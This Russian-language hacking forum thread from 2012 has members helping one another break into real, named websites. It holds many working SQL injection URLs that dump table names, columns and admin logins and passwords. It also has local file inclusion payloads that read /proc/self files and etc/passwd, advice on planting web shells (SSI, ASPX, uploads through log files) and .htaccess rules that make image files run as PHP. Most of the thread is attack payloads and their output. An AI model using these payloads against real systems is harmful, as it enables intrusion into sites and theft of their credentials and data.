/./././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././&
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
Подскажите как мне использовать эту уязвимость ?
Просто ввести site.ru/admin.php?en_log_id=0&action=config: ничего не делает
И что за ссылка типа с каким-то скриптом или программой ? http://www.webrc.ca
при заливке php, вылезает 500 ошибка, php[2-5] показываются как текст, а phtml скачивается
есть какие-нибудь варианты что можно сделать?
Expl0ited
18.03.2012, 15:00
.htaccess
переименовывает файлы, только расширение оставляет
Faaax said:
запрос такой
Code:
curl "http://site.com/pid=../../../../../../../../../../../../../../../../../../proc/self/cmdline&/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
Code:
curl "http://site.com/pid=../../../../../../../../../../../../../../../../../../proc/self/cmdline/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././&
блин, чёт так не выходит в первом варианте, окончание не обрезается
во втром ничего не происходт
faza02 said:
при заливке php, вылезает 500 ошибка, php[2-5] показываются как текст, а phtml скачивается
есть какие-нибудь варианты что можно сделать?
заливай SSI шелл. не раз спасал уже.
qaz said:
блин, чёт так не выходит в первом варианте, окончание не обрезается
во втром ничего не происходт
вот вот,сам ломаю голову
xcedz said:
4.4.1 and earlier,
when register_globals is enabled
, allows remote attackers to bypass authentication, and gain the ability to execute arbitrary code, via the en_login_id parameter.
http://www.exploit-db.com/exploits/2588/
Из эксплойта там строчка http://[target]/[path]/admin.php?action=users&en_login_id=0
перейдя по которой я ничего сделать не могую
Также описывается что можно редактировать config2.php или любую другую страничку но и этого не могу
OxoTnik, нет, все так же 500
Boolean, SSI doesn't work
shadowrun
18.03.2012, 21:11
Code:
http://www.surbor.su/enicinfo.php?id=22+order+by+100+--+
не думается...
shadowrun,
Code:
http://www.surbor.su/enicinfo.php?id=22/**/Order/**/by/**/11--+d true
Делаем запрос:
Code:
http://www.surbor.su/enicinfo.php?id=-1+union+all+select+null,@@version,null,null,null,n ull,null,null,null,null,null,null--
Code:
Soulk3r,
посмотри phpinfo(); (найди где-нибудь). Rg=on должен быть, чтоб твой exploit сработал.
shadowrun
18.03.2012, 23:58
Code:
http://www.studyguide.ru/schools.php?id=817%27+uni/**/On+Sel/**/Ect+1+--+
хз
Ereee,
посмотри phpinfo(); (найди где-нибудь). Rg=on должен быть, чтоб твой exploit сработал.
Если не выходит найти phpinfo(); и Эксплойт не пашет значит Rg=off ? и тогда эту багу нельзя юзать ?
короче такой вопрос, есть возможность залить файл на сервер через mysql на там работают файлы только с разширением aspx, я так понял php скрипт там работать небудет) как тогда быть? есть мож какие шеллы написаные на aspx? ))
aydin-ka
19.03.2012, 18:09
qaz said:
короче такой вопрос, есть возможность залить файл на сервер через mysql на там работают файлы только с разширением aspx, я так понял php скрипт там работать небудет) как тогда быть? есть мож какие шеллы написаные на aspx? ))
Вот он (https://antichat.live/nextoldesttothread31454.html/)
aydin-ka said:
Вот он (https://antichat.live/nextoldesttothread31454.html/)
так те ссылочки что оставил ettee уже не работают
aydin-ka
19.03.2012, 18:55
qaz said:
так те ссылочки что оставил ettee уже не работают
Попробуй этот (https://rdot.org/forum/showthread.php?t=1116)
aydin-ka said:
Попробуй этот (https://rdot.org/forum/showthread.php?t=1116)
та попробовать то можно но чем я заменю функцию
?
foma9999
19.03.2012, 20:56
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
foma9999 said:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6 ,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TA BLE_NAME=0x52726567696f6e7341646d696e73--+a
Где
0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX.
shadowrun
19.03.2012, 21:03
foma9999 said:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
Code:
http://www.svrwheels.ru
/index.php?pageId=-2+union+select+1,Group_concat%28column_name%29,3,4 ,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.columns+Wher e+table_name=0x52726567696f6e7341646d696e73+--+
Ereee опередил...
foma9999
19.03.2012, 21:09
Ereee said:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6 ,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TA BLE_NAME=0x52726567696f6e7341646d696e73--+a
Где
0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX.
Спасибо!
А как вывести структуру бд?
как тут http://i.imgur.com/5e1qH.png
UPD:
Почему
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,pass,login,4,5,6,7,8,9,10+FROM+0x 52726567696f6e7341646d696e73+--+
ничего не выводит, кроме ошибки? Что не так?
Структура:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20selec t%20@pro:=0x2727,%20(select%20null%20from%20inform ation_schema.tables%20where%20concat(table_schema, 0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0 x2c27,table_schema,0x2e,table_name,0x27))limit%200 ,1))f),3,4,5,6,7,8,9,10--+a
По-твоему вопросу:
1. Нельзя после FROM имя таблицы в hex переводит.
2. Твоя таблица в другой базе:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,concat(table_name,0x3a,table_sche ma),3,4,5,6,7,8,9,10+FROM+information_schema.table s+limit+51,1--+a
3. Тебе нужно потренироватся на буржуйских сайтах.
4. Пустая таблица:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,count(*),3,4,5,6,7,8,9,10+FROM+u2 61330_catalog.RregionsAdmins+limit+0,1--+a
В написано, что записей "0".
foma9999
19.03.2012, 21:26
Ereee said:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20selec t%20@pro:=0x2727,%20(select%20null%20from%20inform ation_schema.tables%20where%20concat(table_schema, 0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0 x2c27,table_schema,0x2e,table_name,0x27))limit%200 ,1))f),3,4,5,6,7,8,9,10--+a
что значит а после коммента?
winstrool
19.03.2012, 21:53
foma9999 said:
что значит а после коммента?
дамы и господа прежде чем задавать какиелибо вопросы по SQL-иньекциям ознакомтись пожалуйсто со статьей http://forum.antichat.net/thread43966.html а потом только выесняйте непонятные моменты! ("а" обсолютно ничего не значит после комента, так как она закоментирована)
winstrool said:
дамы и господа прежде чем задавать какиелибо вопросы по SQL-иньекциям ознакомтись пожалуйсто со статьей http://forum.antichat.net/thread43966.html а потом только выесняйте непонятные моменты! ("а" обсолютно ничего не значит после комента, так как она закоментирована)
А я думал браузер удаляет пробел, если он в самом концу URL. Т.е. для браузера:
-- =--
А если сделать -- a, то не будет удалять пробел. Я так думал.
KolosJey
19.03.2012, 23:22
Ereee said:
А я думал браузер удаляет пробел, если он в самом концу URL. Т.е. для браузера:
--
=
--
А если сделать
-- a
, то не будет удалять пробел. Я так думал.
Ты правильно думал, только не браузер его удаляет, а есть приличный шанс нарваться например на trim().
winstrool у тебя все посты такие чёткие, что лучше тебе не писать совсем, а то ещё с группы выгонят не дай бог
Expl0ited said:
Выполнение PHP кода:
http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&
Вернет:
/bin/apache2___[zamok-met.ru] GET /catalog.php?id=../../../../proc/self/cmdline%00&
Linux cabol.beget.ru 2.6.35.14 #4 SMP Sun Aug 14 23:30:33 MSD 2011 x86_64
HTTP/1.0
Запрос отправлять не через браузер, иначе все символы урлкодируются.
а почему например тут так не получается?
http://www2.mati.ru/english/index.php?path=../../../../../../../../../../../proc/self/cmdline%00&%3C?php%20print%20php_uname%28%29;?%3E
или тут
http://bombaticket.ru/pg.php?p=../../../../../proc/self/cmdline%00&%3C?php%20print%20php_uname%28%29;?%3E
а ты через curl пробовал отсылать запрос?
Faaax said:
а ты через curl пробовал отсылать запрос?
ну да
Expl0ited
20.03.2012, 14:41
Про инклуд, есть миллион статей, в которых описываются какие именно нужно инклюдить файлы, зачем везде инклюдить /proc/self/cmdline в который ничего не попадает из вашего запроса к серверу?
Facecontrol
20.03.2012, 20:20
А как такое возможно в phpMyAdmin есть 4 одинаковых пользователя но у двоих из них File_priv Y а у двоих N,как это вообще понимать?
Pirotexnik
20.03.2012, 20:35
Facecontrol said:
А как такое возможно в phpMyAdmin есть 4 одинаковых пользователя но у двоих из них File_priv Y а у двоих N,как это вообще понимать?
У них host одинаковый? Если нет, то понимать адекватно.
Если да - то админы мудаки.
foma9999
20.03.2012, 20:46
http://www.allsoch.ru/soch/works.php?AuthorID=-3
Это является sql-inj?
Возможно ли раскрутить?
Pirotexnik
20.03.2012, 20:49
Дыры нету, просто при отрицательном параметре ошибка.
foma9999
20.03.2012, 20:57
Как узнать путь на хостинге, имея sql-inj?
Вот таблицы с данными админки нет, делаю
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' --
пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt --' at line 1
Facecontrol
20.03.2012, 21:00
Pirotexnik said:
У них host одинаковый? Если нет, то понимать адекватно.
Если да - то админы мудаки.
Одинаковый.Что значит мудаки?
короче просто некоторым пользователям выставили ограничение на заливку файло,там обновление.
теперь надеюсь понятно?!?!
МУДАКИ-->значит мудаки
Pirotexnik
20.03.2012, 21:41
Мудаки, потому, что базу засирают.
foma9999, мм, похоже на error based, но очень странная. Я не смог раскрутить. Софт тоже не взял. Спроси у Ereee.
foma9999
20.03.2012, 22:45
http://i.imgur.com/y2VVs.png
http://i.imgur.com/ULCKV.png
Как сливать базу в таком виде?
KolosJey
20.03.2012, 22:51
Facecontrol said:
Одинаковый.
так не бывает
foma9999
20.03.2012, 23:30
http://www.globalomsk.ru/directory/user.php
Есть sql?
foma9999 said:
Как узнать путь на хостинге, имея sql-inj?
Вот таблицы с данными админки нет, делаю
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' --
пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt --' at line 1
если есть права на чтение запись то прочитай файл etc/passwd
foma9999 said:
http://www.globalomsk.ru/directory/user.php
Есть sql?
да, там в форме входа
foma9999 said:
http://i.imgur.com/y2VVs.png
http://i.imgur.com/ULCKV.png
Как сливать базу в таком виде?
да вы уже со всем обленились((((
берите toolza,sqlmap и вперёд
я думаю такие посты либо сразу delete либо выговор какой нить,модеры позаботьтесь об этом
Ребят, что делать если proc/self/environ пуст?
Хотя тут всё ок
proc/self/status
proc/self/cmdline (/usr/sbin/apache2-kstart)
etc/passwd
Fooog
Во-первых, к переменным окружения не всегда есть доступ.
Во-вторых, там не всегда есть данные, которыми можно манипулировать.
В -третьих, твои слова:
хоть с null байтом, хоть без
Звучат весьма, мммммм, эпично =\
ну так а что в таком случае делать?
Fooog said:
Tigger, я только вчера LFI уязвимость начал разбирать ;D
зы
ну так а что в таком случае делать?
искать логи и заливать шел через них
Pirotexnik
21.03.2012, 13:03
Fooog said:
Tigger, я только вчера LFI уязвимость начал разбирать ;D
зы
ну так а что в таком случае делать?
Если на сервере (именно на всем сервере на любом сайте) есть phpinfo - можно спокойно залить шелл через LFI.
как раскрутить через error based?
http://www.sirirajmedj.com/content.php?content_id=2554
smirk said:
как раскрутить через error based?
http://www.sirirajmedj.com/content.php?content_id=2554
Например так:
http://www.sirirajmedj.com/content.php?content_id=2554+and(select+1+from(sele ct+count(*),concat((select+table_name+from+informa tion_schema.tables+limit+1,1),floor(rand(0)*2))x+f rom+information_schema.tables+group+by+x)a)--
Смотри исходник(внизу):
Code:
а вот такой вопрос, залил шелл на сайт через админку, открываю его а мне пишет
500 Внутренняя ошибка сервера, я тут гдето видел что нужно залить файл htaccess а что в нём должно быть написано чтобы всё работало?
Code:
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
Ereee said:
Например так:
http://www.sirirajmedj.com/content.php?content_id=2554+and(select+1+from(sele ct+count(*),concat((select+table_name+from+informa tion_schema.tables+limit+1,1),floor(rand(0)*2))x+f rom+information_schema.tables+group+by+x)a)--
Смотри исходник(внизу):
Code:
спасибо большое, ток я не могу тебе + поставить
Faaax said:
Code:
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
не, я та и php могу залить, мне не нужна картинка, тросто при открытии шелла пишет 500 Внутренняя ошибка сервера, может файл htaccess както помочь ето исправить?
да ты попробуй,во многих случаях помагает,так как расширение не пхп будет
Faaax said:
да ты попробуй,во многих случаях помагает,так как расширение не пхп будет
Попробовал, картинка просто начинает скачиватся
qaz, удали .htaccess, тогда 500-ошибка исчезнет.
Ereee said:
qaz,
удали .htaccess, тогда 500-ошибка исчезнет.
я не могу его удалить, я могу только заливать файлы и удалять то что залил
Nightmarе said:
Ага, как вариант, но вообще, эта ошибка появляется когда файл загружается по умолчанию с правами 644, а для выполнения php кода ему нужно другие права, как правило это 755, вот чмодом только и можно помочь.
наверно так оно есть, блян, не залью я шелл http://s19.rimg.info/df2a93dc7bf97c86213777624eb222d6.gif
anonym_di
21.03.2012, 17:54
Вот хотел спросить как раскрутить это
Code:
http://www.nurbank.kz/investor/meetings/?page=%22'%3CCwSlZ%3E
Expl0ited
21.03.2012, 17:56
anonym_di said:
Вот хотел спросить как раскрутить это
Code:
http://www.nurbank.kz/investor/meetings/?page=%22'%3CCwSlZ%3E
никак
Безусловно я набиваю посты! Интересно куда смотрят модераторы, пускай банят
Вот запрос
http://www.f-b-i.ru/index.php?id=0
id попадает в LIMIT, сам селект
$id = $_GET['id'];
$result=mysql_query("SELECT * FROM wp_posts where ID=1 limit $id,1");
Вот скуль
http://www.f-b-i.ru/index.php?id=0,1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23+--+1
Почему нельзя в LIMIT крутить скуль?
KolosJey
21.03.2012, 19:47
t0ma5 said:
Безусловно я набиваю посты! Интересно куда смотрят модераторы, пускай банят
Вот запрос
http://www.f-b-i.ru/index.php?id=0
id попадает в LIMIT, сам селект
$id = $_GET['id'];
$result=mysql_query("SELECT * FROM wp_posts where ID=1 limit $id,1");
Вот скуль
http://www.f-b-i.ru/index.php?id=0,1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23+--+1
Почему нельзя в LIMIT крутить скуль?
order by поставь в запрос, как на сайте, и крути
Expl0ited
21.03.2012, 19:48
Вы должны добавить репутацию кому-то еще, прежде чем сможете снова добавить ее KolosJey.
Facecontrol
21.03.2012, 23:26
А что если sql-inj присутствует в кукисах.То как её можно проверить и воспользоваться этим?
Facecontrol said:
А что если sql-inj присутствует в кукисах.То как её можно проверить и воспользоваться этим?
Конечно. Для быстрой эксплуатации рекомендую плагин для FF LiveHTTPHeaders.
Vladislav88
22.03.2012, 00:31
Может кто знает в mutillidae нашел все таблицы , вывел колонки из users а когда хочу просмотреть содержимое колонок users то мне выдает ошибку. запрос такой : 'UNION SELECT 1,(user,0x3b,password),3,4 from users # (проверял тоже самое в dvwa - все работает) . Как мне узнать логины и пароли?
Vladislav88 said:
Может кто знает в mutillidae нашел все таблицы , вывел колонки из users а когда хочу просмотреть содержимое колонок users то мне выдает ошибку. запрос такой : 'UNION SELECT 1,(user,0x3b,password),3,4 from users # (проверял тоже самое в dvwa - все работает) . Как мне узнать логины и пароли?
UNION+SELECT+1,concat_ws(user,0x3b,password),3,4+f rom+users+limit+0,1 --
а колонки то те? что пишет в ошибке?
Га-Ноцри
22.03.2012, 01:15
Vladislav88 said:
Может кто знает в mutillidae нашел все таблицы , вывел колонки из users а когда хочу просмотреть содержимое колонок users то мне выдает ошибку. запрос такой : 'UNION SELECT 1,(user,0x3b,password),3,4 from users # (проверял тоже самое в dvwa - все работает) . Как мне узнать логины и пароли?
Своим запросом ты пытаешься выбрать записи(данные) из колонок "user" и "password" в таблице "users". В случае с dvwa(насколько я понял, это какой-то специальный сайт, показывающий как не надо их, сайты, делать) - такие колонки действительно есть. Но в боевых случаях, как у тебя, на примере конкретно твоей БД сайта с которой ты пытаешься работать, совсем не факт, что существует именно такая таблица именно с такими колонками. Они могут называться совершенно по другому. (Если я правильно тебя понял)
Pirotexnik
22.03.2012, 01:39
Nightmarе said:
Ага, как вариант, но вообще, эта ошибка появляется когда файл загружается по умолчанию с правами 644, а для выполнения php кода ему нужно другие права, как правило это 755, вот чмодом только и можно помочь.
Может я ошибаюсь, но несешь бред. PHP исполняется великолепно даже при 400. Я такие права на шелл раз ставил, у админов другой юзер не могли снести. Мало того, при правельно настроеном хостинге файлы пхп пренадлежащие юзеру не доступны даже для изменения апачем.
Expl0ited
22.03.2012, 10:08
Pirotexnik said:
Может я ошибаюсь, но несешь бред. PHP исполняется великолепно даже при 400.
ты ошибаешься
Pirotexnik
22.03.2012, 11:24
2Expl0ited перепроверил.
Стоят права 400. Только чтение, и только для апача. Все работает великолепно.
http://imglink.ru/thumbnails/22-03-12/d84aed2c505b79b0955202508f623254.jpg (http://imglink.ru/show-image.php?id=c5042e0e9382150e2ced86f924cb21b6)
Expl0ited
22.03.2012, 11:29
Pirotexnik said:
2Expl0ited перепроверил.
Стоят права 400. Только чтение, и только для апача. Все работает великолепно.
http://imglink.ru/thumbnails/22-03-12/d84aed2c505b79b0955202508f623254.jpg (http://imglink.ru/show-image.php?id=c5042e0e9382150e2ced86f924cb21b6)
Всё зависит от настроек php, веб-сервера и операционной системы.
встречал сервера с вайт листами, если файл отсутствует в списке разрешенных, то он не исполняется, но это уже единичные случаи.
И опять же, что касается твоего случая, в твоем случае apache запущен от юзера www-data, и скрипт с шеллом создан от этого же юзера, соответственно, независимо от прав, этот скрипт будет работать в пределах этого юзера. Создай скрипт от другого пользователя, и дай ему 0400, и система будет вежлево посылать.
Pirotexnik
22.03.2012, 11:36
хм, действительно. Спасибо.
Но в большинстве случае шелл заливается с того же юзера, что и апач.
Expl0ited
22.03.2012, 11:39
Pirotexnik said:
хм, действительно. Спасибо.
Но в большинстве случае шелл заливается с того же юзера, что и апач.
единственное, что не во всех случаях разрешено этому пользователю создавать исполняемые пхп скрипты.
iProtoss
22.03.2012, 21:11
нашел активную sql инъекцию однако не получается составить запрос
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
WHERE tq.virtual_id=2 AND ta.virtual_id=12
UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'
на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION
в ответе возвращается ERROR: DB Error: syntax error
можете что-нить посоветовать?
юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
Vollkorn
22.03.2012, 22:08
iProtoss said:
нашел активную sql инъекцию однако не получается составить запрос
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
WHERE tq.virtual_id=2 AND ta.virtual_id=12
UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'
на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION
в ответе возвращается ERROR: DB Error: syntax error
можете что-нить посоветовать?
юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
что-то вообще ничего понять не могу
в mysql нельзя писать union insert, если ты об этом
iProtoss said:
нашел активную sql инъекцию однако не получается составить запрос
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
WHERE tq.virtual_id=2 AND ta.virtual_id=12
UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'
на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION
в ответе возвращается ERROR: DB Error: syntax error
можете что-нить посоветовать?
юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
Попробуй это
http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html
А вообще, лучше бы ты линк скинул.
Melfis said:
http://sibkulinar.ru/placecooking.php
?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
народ. что ети функции делают я понимаю, непойму почему они заставляют вывоится инфу, кто может обьяснить?
aydin-ka
23.03.2012, 13:04
qaz said:
народ. что ети функции делают я понимаю, непойму почему они заставляют вывоится инфу, кто может обьяснить?
FLOOR(RAND(0)*2) - Эта функция заставляет скрипт выводить ошибку.
aydin-ka said:
FLOOR(RAND(0)*2) - Эта функция заставляет скрипт выводить ошибку.
не, ну ето я уже знаю
но вот например так не выводит
http://sibkulinar.ru/placecooking.php?id=2%27+or+1+group+by+concat%28%2 8select+version%28%29%29,0x00,floor%28rand%280%29* 2%29%29having+min%280%29+or+1--+
а так выводит
http://sibkulinar.ru/placecooking.php
?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
почему?
qaz said:
не, ну ето я уже знаю
но вот например так не выводит
http://sibkulinar.ru/placecooking.php?id=2%27+or+1+group+by+concat%28%2 8select+version%28%29%29,0x00,floor%28rand%280%29* 2%29%29having+min%280%29+or+1--+
а так выводит
http://sibkulinar.ru/placecooking.php
?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
почему?
потому что это блайнд. и в данном случае результат запроса возвращается в ошибке. т.е. для эксплутации нам нужно вызвать ошибку и вывести через неё данные. вот и вся суть error based'a.
d1v said:
потому что это блайнд. и в данном случае результат запроса возвращается в ошибке. т.е. для эксплутации нам нужно вызвать ошибку и вывести через неё данные. вот и вся суть error based'a.
хм... неочень понятно,
допустим тут разве результат запроса не возвращается в ошибке? ведь тут тоже вызваем ошибку и выводим через неё данные
+or+1+group+by+concat((select+version()),0x00,floo r(rand(0)*2))having+min(0)+or+1--+
или нет?
t3cHn0iD
23.03.2012, 13:30
qaz said:
хм... неочень понятно,
допустим тут разве результат запроса не возвращается в ошибке? ведь тут тоже вызваем ошибку и выводим через неё данные
+or+1+group+by+concat((select+version()),0x00,floo r(rand(0)*2))having+min(0)+or+1--+
или нет?
http://www.xakep.ru/post/52222/ - почитай эту статейку, думаю все станет ясно.
iProtoss
23.03.2012, 16:07
*okay.jpg*
сайт в локалке, зеркала в интернеты вроде бы нету(
http://test/continue_testing/?action=3&session=2825&answer=12&question=1
ERROR: DB Error: no such table
ERROR: DB Error: no such table
Невозможно выполнить вставку в таблицу результатов
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 2825, tq.quest_id, ta.id, '2012-03-23 12:55:38'
FROM tmp_answers_2825 as ta, tmp_quest_2825 as tq
WHERE tq.virtual_id=1 AND ta.virtual_id=12
2825 - номер сессии берется из адресной строки - и записывается во все места в запросе - 2825, tmp_answers_2825, p_quest_2825
номер сессии, при которой запрос выполнится тоже известен - 28275
tq.virtual_id=1 и ta.virtual_id=12 - тоже берется гетом
возможность просмотреть результат вывода точно есть по ячейке start_time
проверки входных данных нету (&question=1 AND 1=1 и в таком стиле выполняются)
есть идеи?
помогите разкрутить, чёт невыходит
http://www.fanfics.ru/read.php?id=3&chapter=-616%27
qaz said:
помогите разкрутить, чёт невыходит
http://www.fanfics.ru/read.php?id=3&chapter=-616%27
Как один из вариантов (Blind):
http://www.fanfics.ru/read.php?id=45564&chapter=0'and(substring(version(),1,1)=5)and'1 - TRUE
http://www.fanfics.ru/read.php?id=45564&chapter=0'and(substring(version(),1,1)=4)and'1 - FALSE
Ну и ErrorBased можно:
http://www.fanfics.ru/read.php?id=45564&chapter=0'and(extractvalue(1,concat(0x3a,version() )))and'
Справа видим:
SotMarketERROR: 1105 - XPATH syntax error: ':
5.1.45'
http://www.zoo-friend.ru/?m=292&action=show_item&id=-3020%27+or+1+group+by+%28select+1+from%28select+co unt%28*%29,concat%28%28select+concat_ws%280x3a,log in,password%29+from+users+limit+0,1%29,0x00,floor% 28rand%280%29*2%29%29x+from+information_schema.tab les+group+by+x%29a%29+or+1--+
выводит Subquery returns more than 1 row
